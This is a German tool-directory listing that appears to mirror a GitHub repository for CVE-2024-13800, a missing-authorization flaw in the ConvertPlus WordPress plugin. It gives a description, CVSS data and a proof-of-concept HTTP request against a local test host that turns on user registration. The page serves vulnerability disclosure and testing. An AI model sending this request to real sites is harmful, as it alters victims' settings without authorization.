Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-13800 — Popup-Plugin für WordPress - ConvertPlus <= 3.5.30 - Fehlende Autorisierung für authentifizierte (Abonnent+) begrenzte Optionsaktualisierung | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-13800
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsFehlkonfiguration
GitHubrandomrobbiebf/cve-2024-13800

CVE-2024-13800

Popup-Plugin für WordPress - ConvertPlus <= 3.5.30 - Fehlende Autorisierung für authentifizierte (Abonnent+) begrenzte Optionsaktualisierung

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-13800

Popup-Plugin für WordPress - ConvertPlus <= 3.5.30 - Fehlende Autorisierung für authentifizierte (Subscriber+) eingeschränkte Optionsaktualisierung

Beschreibung

Das ConvertPlus-Plugin für WordPress ist in allen Versionen bis einschließlich 3.5.30 anfällig für unbefugte Änderungen von Daten, die zu einem Denial-of-Service führen können, da eine fehlende Berechtigungsprüfung am AJAX-Endpunkt 'cp_dismiss_notice' vorliegt. Dadurch können authentifizierte Angreifer mit Zugriff auf Subscriber-Ebene und höher Optionswerte auf der WordPress-Website auf '1' setzen. Dies kann ausgenutzt werden, um eine Option zu aktualisieren, die einen Fehler auf der Website erzeugt und legitimen Benutzern den Dienst verweigert, oder um bestimmte Werte auf true zu setzen, wie etwa die Registrierung.

Details

  • Typ: Plugin
  • Slug: convertplug
  • Betroffene Version: 3.5.30
  • CVSS-Score: 8.1
  • CVSS-Bewertung: Hoch
  • CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-13800
  • Status: Privat

Hinweise

Es schreibt lediglich eine 1 in die Datenbank, sodass man nur eine 1 in users_can_register setzen kann.

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:5555
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://kubernetes.docker.internal:5555
Connection: keep-alive
Referer: http://kubernetes.docker.internal:5555/wp-admin/options-general.php
Cookie: wordpress_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7C8cb19a315a9569e77d5be2bf7555f178a9edba2afbc32d1499b8cfd5552e28b9; wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1742893819; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7Cf4d35f828e20c240ecf95e5940bddf55741adc8048977e60afd45a178c003011

action=cp_dismiss_notice&notice=users_can_register
Tool herunterladen